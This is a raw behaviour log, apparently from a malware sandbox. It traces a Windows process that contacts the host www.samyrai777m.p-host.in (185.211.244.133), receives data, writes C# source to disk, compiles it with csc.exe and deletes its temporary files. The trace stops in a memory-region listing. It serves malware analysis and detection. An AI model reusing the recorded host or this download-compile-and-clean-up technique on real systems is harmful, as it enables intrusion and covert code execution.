[0058.528] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x231ae748 | out: pFixedInfo=0x0, pOutBufLen=0x231ae748) returned 0x6f
[0058.560] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x7880690
[0058.560] GetNetworkParams (in: pFixedInfo=0x7880690, pOutBufLen=0x231ae748 | out: pFixedInfo=0x7880690, pOutBufLen=0x231ae748) returned 0x0
[0058.616] CoTaskMemAlloc (cb=0xd) returned 0x5bde3a0
[0058.616] inet_addr (cp="192.168.0.1") returned 0x100a8c0
[0058.616] CoTaskMemFree (pv=0x5bde3a0)
[0058.641] LocalFree (hMem=0x7880690) returned 0x0
[0058.669] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xb94
[0058.670] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x80c
[0058.672] CoTaskMemAlloc (cb=0x1b) returned 0x793de50
[0058.673] getaddrinfo (in: pNodeName="www.samyrai777m.p-host.in", pServiceName=0x0, pHints=0x231ae6f0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x231ae6e8 | out: ppResult=0x231ae6e8*=0x7aa0970*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.samyrai777m.p-host.in", ai_addr=0x5be0ba0*(sa_family=2, sin_port=0x0, sin_addr="185.211.244.133"), ai_next=0x0)) returned 0
[0059.339] CoTaskMemFree (pv=0x793de50)
[0059.339] CoTaskMemFree (pv=0x0)
[0059.340] FreeAddrInfoW (pAddrInfo=0x7aa0970*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="睷慳祭慲㝩㜷⵰潨瑳椮n", ai_addr=0x5be0ba0*(sa_family=2, sin_port=0x0, sin_addr="185.211.244.133"), ai_next=0x0))
[0059.340] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xb98
[0059.341] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xba4
[0059.341] ioctlsocket (in: s=0xb98, cmd=-2147195266, argp=0x231ae708 | out: argp=0x231ae708) returned 0
[0059.341] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xba8
[0059.341] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xbac
[0059.341] ioctlsocket (in: s=0xba8, cmd=-2147195266, argp=0x231ae708 | out: argp=0x231ae708) returned 0
[0059.341] WSAIoctl (in: s=0xb98, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x231ae680, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x231ae680, lpOverlapped=0x0) returned -1
[0059.341] CoTaskMemAlloc (cb=0x204) returned 0x5ab8780
[0059.342] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5ab8780, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
[0059.342] CoTaskMemFree (pv=0x5ab8780)
[0059.342] WSAEventSelect (s=0xb98, hEventObject=0xba4, lNetworkEvents=512) returned 0
[0059.342] WSAIoctl (in: s=0xba8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x231ae680, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x231ae680, lpOverlapped=0x0) returned -1
[0059.342] CoTaskMemAlloc (cb=0x204) returned 0x5ab8780
[0059.342] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5ab8780, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
[0059.342] CoTaskMemFree (pv=0x5ab8780)
[0059.342] WSAEventSelect (s=0xba8, hEventObject=0xbac, lNetworkEvents=512) returned 0
[0059.343] GetAdaptersAddresses () returned 0x6f
[0059.353] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x2cefbb0
[0059.353] GetAdaptersAddresses () returned 0x0
[0059.364] LocalFree (hMem=0x2cefbb0) returned 0x0
[0059.367] WSAConnect (in: s=0xb94, name=0xa60b708*(sa_family=2, sin_port=0x50, sin_addr="185.211.244.133"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
[0059.448] closesocket (s=0x80c) returned 0
[0059.524] send (in: s=0xb94, buf=0xa60f438*, len=92, flags=0 | out: buf=0xa60f438*) returned 92
[0059.543] setsockopt (s=0xb94, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
[0059.544] recv (in: s=0xb94, buf=0xa607c08, len=4096, flags=0 | out: buf=0xa607c08*) returned 1240
[0059.669] setsockopt (s=0xb94, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
[0059.678] SetEvent (hEvent=0xa7c) returned 1
[0059.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x231ae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
[0059.958] CoGetContextToken (in: pToken=0x231aba90 | out: pToken=0x231aba90) returned 0x0
[0059.959] CoGetObjectContext (in: riid=0x7fee38fd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7d2bbc8 | out: ppv=0x7d2bbc8*=0x2316ff0) returned 0x0
[0059.960] CoGetContextToken (in: pToken=0x231aba60 | out: pToken=0x231aba60) returned 0x0
[0059.960] CoGetContextToken (in: pToken=0x231abf60 | out: pToken=0x231abf60) returned 0x0
[0059.963] CoGetContextToken (in: pToken=0x231abea0 | out: pToken=0x231abea0) returned 0x0
[0059.964] CoGetContextToken (in: pToken=0x231ac0c0 | out: pToken=0x231ac0c0) returned 0x0
[0059.964] CoGetContextToken (in: pToken=0x231ac000 | out: pToken=0x231ac000) returned 0x0
[0059.972] CoGetContextToken (in: pToken=0x231aba70 | out: pToken=0x231aba70) returned 0x0
[0059.972] CoGetContextToken (in: pToken=0x231aba40 | out: pToken=0x231aba40) returned 0x0
[0059.972] CoGetContextToken (in: pToken=0x231abf40 | out: pToken=0x231abf40) returned 0x0
[0059.972] CoGetContextToken (in: pToken=0x231abe80 | out: pToken=0x231abe80) returned 0x0
[0059.974] CoGetContextToken (in: pToken=0x231ac240 | out: pToken=0x231ac240) returned 0x0
[0059.974] CoGetContextToken (in: pToken=0x231ac180 | out: pToken=0x231ac180) returned 0x0
[0059.975] CoGetContextToken (in: pToken=0x231aba90 | out: pToken=0x231aba90) returned 0x0
[0059.975] CoGetContextToken (in: pToken=0x231aba60 | out: pToken=0x231aba60) returned 0x0
[0059.975] CoGetContextToken (in: pToken=0x231abf60 | out: pToken=0x231abf60) returned 0x0
[0059.975] CoGetContextToken (in: pToken=0x231abea0 | out: pToken=0x231abea0) returned 0x0
[0059.976] CoGetContextToken (in: pToken=0x231ac1d0 | out: pToken=0x231ac1d0) returned 0x0
[0059.976] CoGetContextToken (in: pToken=0x231ac110 | out: pToken=0x231ac110) returned 0x0
[0059.986] lstrlenW (lpString="System.Runtime.Remoting, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089") returned 90
[0059.986] CoTaskMemAlloc (cb=0xb8) returned 0x7ce1e10
[0059.986] RtlMoveMemory (in: Destination=0x7ce1e10, Source=0xa61e3b0, Length=0xb6 | out: Destination=0x7ce1e10)
[0059.986] CoTaskMemFree (pv=0x7ce1e10)
[0059.997] GetFullPathNameW (in: lpFileName="Logo.cs", nBufferLength=0x105, lpBuffer=0x231ae580, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\Logo.cs", lpFilePart=0x0) returned 0x21
[0059.997] SetErrorMode (uMode=0x1) returned 0x8001
[0059.997] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\Desktop\\Logo.cs" (normalized: "c:\\users\\aetadzjz\\desktop\\logo.cs"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xba0
[0059.998] GetFileType (hFile=0xba0) returned 0x1
[0059.998] SetErrorMode (uMode=0x8001) returned 0x1
[0059.998] GetFileType (hFile=0xba0) returned 0x1
[0060.016] WriteFile (in: hFile=0xba0, lpBuffer=0xa624d28*, nNumberOfBytesToWrite=0x44a, lpNumberOfBytesWritten=0x231aeba8, lpOverlapped=0x0 | out: lpBuffer=0xa624d28*, lpNumberOfBytesWritten=0x231aeba8*=0x44a, lpOverlapped=0x0) returned 1
[0060.017] CloseHandle (hObject=0xba0) returned 1
[0060.019] GetFullPathNameW (in: lpFileName="Logo.cs", nBufferLength=0x105, lpBuffer=0x231ae720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\Logo.cs", lpFilePart=0x0) returned 0x21
[0060.019] SetErrorMode (uMode=0x1) returned 0x8001
[0060.019] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\Desktop\\Logo.cs" (normalized: "c:\\users\\aetadzjz\\desktop\\logo.cs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xba0
[0060.019] GetFileType (hFile=0xba0) returned 0x1
[0060.019] SetErrorMode (uMode=0x8001) returned 0x1
[0060.019] GetFileType (hFile=0xba0) returned 0x1
[0060.020] ReadFile (in: hFile=0xba0, lpBuffer=0xa627318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231aebd8, lpOverlapped=0x0 | out: lpBuffer=0xa627318*, lpNumberOfBytesRead=0x231aebd8*=0x44a, lpOverlapped=0x0) returned 1
[0060.020] ReadFile (in: hFile=0xba0, lpBuffer=0xa6266a2, nNumberOfBytesToRead=0x3b6, lpNumberOfBytesRead=0x231aebd8, lpOverlapped=0x0 | out: lpBuffer=0xa6266a2*, lpNumberOfBytesRead=0x231aebd8*=0x0, lpOverlapped=0x0) returned 1
[0060.020] ReadFile (in: hFile=0xba0, lpBuffer=0xa627318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231aebd8, lpOverlapped=0x0 | out: lpBuffer=0xa627318*, lpNumberOfBytesRead=0x231aebd8*=0x0, lpOverlapped=0x0) returned 1
[0060.020] CloseHandle (hObject=0xba0) returned 1
[0060.071] GetCurrentProcess () returned 0xffffffffffffffff
[0060.071] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231aea78 | out: TokenHandle=0x231aea78*=0xba0) returned 1
[0060.074] GetVersionExW (in: lpVersionInformation=0x231ada50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x231ada50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0060.081] CoTaskMemAlloc (cb=0x20c) returned 0x788a2c0
[0060.081] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x788a2c0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25
[0060.081] CoTaskMemFree (pv=0x788a2c0)
[0060.081] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x231ae730, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25
[0060.082] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg", nBufferLength=0x105, lpBuffer=0x231ae760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg", lpFilePart=0x0) returned 0x2d
[0060.083] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg", nBufferLength=0x105, lpBuffer=0x231ae650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg", lpFilePart=0x0) returned 0x2d
[0060.084] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp", nBufferLength=0x105, lpBuffer=0x231ae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp", lpFilePart=0x0) returned 0x31
[0060.084] SetErrorMode (uMode=0x1) returned 0x8001
[0060.084] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xbb8
[0060.085] GetFileType (hFile=0xbb8) returned 0x1
[0060.085] SetErrorMode (uMode=0x8001) returned 0x1
[0060.085] GetFileType (hFile=0xbb8) returned 0x1
[0060.085] CloseHandle (hObject=0xbb8) returned 1
[0060.085] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs", nBufferLength=0x105, lpBuffer=0x231ae5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs", lpFilePart=0x0) returned 0x32
[0060.085] SetErrorMode (uMode=0x1) returned 0x8001
[0060.085] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.0.cs"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xbb8
[0060.086] GetFileType (hFile=0xbb8) returned 0x1
[0060.086] SetErrorMode (uMode=0x8001) returned 0x1
[0060.086] GetFileType (hFile=0xbb8) returned 0x1
[0060.086] WriteFile (in: hFile=0xbb8, lpBuffer=0xa62ddc8*, nNumberOfBytesToWrite=0x44d, lpNumberOfBytesWritten=0x231aead8, lpOverlapped=0x0 | out: lpBuffer=0xa62ddc8*, lpNumberOfBytesWritten=0x231aead8*=0x44d, lpOverlapped=0x0) returned 1
[0060.086] CloseHandle (hObject=0xbb8) returned 1
[0060.091] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline", nBufferLength=0x105, lpBuffer=0x231ae460, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline", lpFilePart=0x0) returned 0x35
[0060.091] SetErrorMode (uMode=0x1) returned 0x8001
[0060.091] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.cmdline"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xbb8
[0060.091] GetFileType (hFile=0xbb8) returned 0x1
[0060.091] SetErrorMode (uMode=0x8001) returned 0x1
[0060.091] GetFileType (hFile=0xbb8) returned 0x1
[0060.092] WriteFile (in: hFile=0xbb8, lpBuffer=0xa6314c8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x231ae988, lpOverlapped=0x0 | out: lpBuffer=0xa6314c8*, lpNumberOfBytesWritten=0x231ae988*=0x120, lpOverlapped=0x0) returned 1
[0060.092] CloseHandle (hObject=0xbb8) returned 1
[0060.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x231ae5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
[0060.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe", nBufferLength=0x105, lpBuffer=0x231ae6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe", lpFilePart=0x0) returned 0x37
[0060.094] SetErrorMode (uMode=0x1) returned 0x8001
[0060.094] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe"), fInfoLevelId=0x0, lpFileInformation=0x231ae8c0 | out: lpFileInformation=0x231ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c4c061, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0xb4c4c061, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0x980ccadb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15738)) returned 1
[0060.094] SetErrorMode (uMode=0x8001) returned 0x1
[0060.095] CoTaskMemAlloc (cb=0x20e) returned 0x788a2c0
[0060.095] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x788a2c0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19
[0060.095] CoTaskMemFree (pv=0x788a2c0)
[0060.095] GetCurrentProcess () returned 0xffffffffffffffff
[0060.095] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae888 | out: TokenHandle=0x231ae888*=0xbbc) returned 1
[0060.097] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out", nBufferLength=0x105, lpBuffer=0x231ae130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out", lpFilePart=0x0) returned 0x31
[0060.097] SetErrorMode (uMode=0x1) returned 0x8001
[0060.097] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.out"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xa633940, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xbb8
[0060.098] GetFileType (hFile=0xbb8) returned 0x1
[0060.098] SetErrorMode (uMode=0x8001) returned 0x1
[0060.098] GetFileType (hFile=0xbb8) returned 0x1
[0060.098] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err", nBufferLength=0x105, lpBuffer=0x231ae130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err", lpFilePart=0x0) returned 0x31
[0060.098] SetErrorMode (uMode=0x1) returned 0x8001
[0060.098] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.err"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xa633c98, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xbc0
[0060.098] GetFileType (hFile=0xbc0) returned 0x1
[0060.098] SetErrorMode (uMode=0x8001) returned 0x1
[0060.098] GetFileType (hFile=0xbc0) returned 0x1
[0060.099] WriteFile (in: hFile=0xbb8, lpBuffer=0xa635798*, nNumberOfBytesToWrite=0x17b, lpNumberOfBytesWritten=0x231ae6a8, lpOverlapped=0x0 | out: lpBuffer=0xa635798*, lpNumberOfBytesWritten=0x231ae6a8*=0x17b, lpOverlapped=0x0) returned 1
[0060.135] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
[0060.148] CoTaskMemAlloc (cb=0x204) returned 0x5ab8780
[0060.148] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0xa6483f0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Desktop", lpStartupInfo=0x231ae600*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0xbb8, hStdError=0xbc0), lpProcessInformation=0xa633f40 | out: lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline\"", lpProcessInformation=0xa633f40*(hProcess=0xbc8, hThread=0xbc4, dwProcessId=0xba0, dwThreadId=0xba4)) returned 1
[0060.190] CoTaskMemFree (pv=0x5ab8780)
[0060.190] CloseHandle (hObject=0xbb8) returned 1
[0060.190] CloseHandle (hObject=0xbc0) returned 1
[0060.191] WaitForSingleObject (hHandle=0xbc8, dwMilliseconds=0x927c0) returned 0x0
[0062.265] GetExitCodeProcess (in: hProcess=0xbc8, lpExitCode=0x231ae838 | out: lpExitCode=0x231ae838*=0x0) returned 1
[0062.266] CloseHandle (hObject=0xbc8) returned 1
[0062.266] CloseHandle (hObject=0xbc4) returned 1
[0062.266] GetCurrentProcess () returned 0xffffffffffffffff
[0062.266] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231aeae8 | out: TokenHandle=0x231aeae8*=0xbc4) returned 1
[0062.267] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.pdb", nBufferLength=0x105, lpBuffer=0x231ae7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.pdb", lpFilePart=0x0) returned 0x31
[0062.267] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.pdb" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.pdb")) returned 0
[0062.267] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out", nBufferLength=0x105, lpBuffer=0x231ae7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out", lpFilePart=0x0) returned 0x31
[0062.267] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.out")) returned 1
[0062.268] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp", nBufferLength=0x105, lpBuffer=0x231ae7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp", lpFilePart=0x0) returned 0x31
[0062.268] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.tmp")) returned 1
[0062.268] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs", nBufferLength=0x105, lpBuffer=0x231ae7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs", lpFilePart=0x0) returned 0x32
[0062.268] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.0.cs")) returned 1
[0062.268] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline", nBufferLength=0x105, lpBuffer=0x231ae7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline", lpFilePart=0x0) returned 0x35
[0062.268] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.cmdline")) returned 1
[0062.269] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err", nBufferLength=0x105, lpBuffer=0x231ae7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err", lpFilePart=0x0) returned 0x31
[0062.269] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.err")) returned 1
[0062.269] GetFullPathNameW (in: lpFileName="__Sn.cs", nBufferLength=0x105, lpBuffer=0x231ae950, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\__Sn.cs", lpFilePart=0x0) returned 0x21
[0062.269] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\Desktop\\__Sn.cs" (normalized: "c:\\users\\aetadzjz\\desktop\\__sn.cs")) returned 0
[0062.269] CoUninitialize ()
Thread:
id = 28
os_tid = 0xb64
Thread:
id = 29
os_tid = 0xb68
[0044.690] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0044.694] ResetEvent (hEvent=0xa7c) returned 1
Thread:
id = 35
os_tid = 0xbd0
Thread:
id = 36
os_tid = 0xbd4
Thread:
id = 72
os_tid = 0x95c
Process:
id = "2"
image_name = "csc.exe"
filename = "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe"
page_root = "0x3d8be000"
os_pid = "0xba0"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x9b0"
cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline\""
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 557
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 558
start_va = 0x30000
end_va = 0x12ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 559
start_va = 0x400000
end_va = 0x418fff
entry_point = 0x400000
region_type = mapped_file
name = "csc.exe"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe")
Region:
id = 560
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 561
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
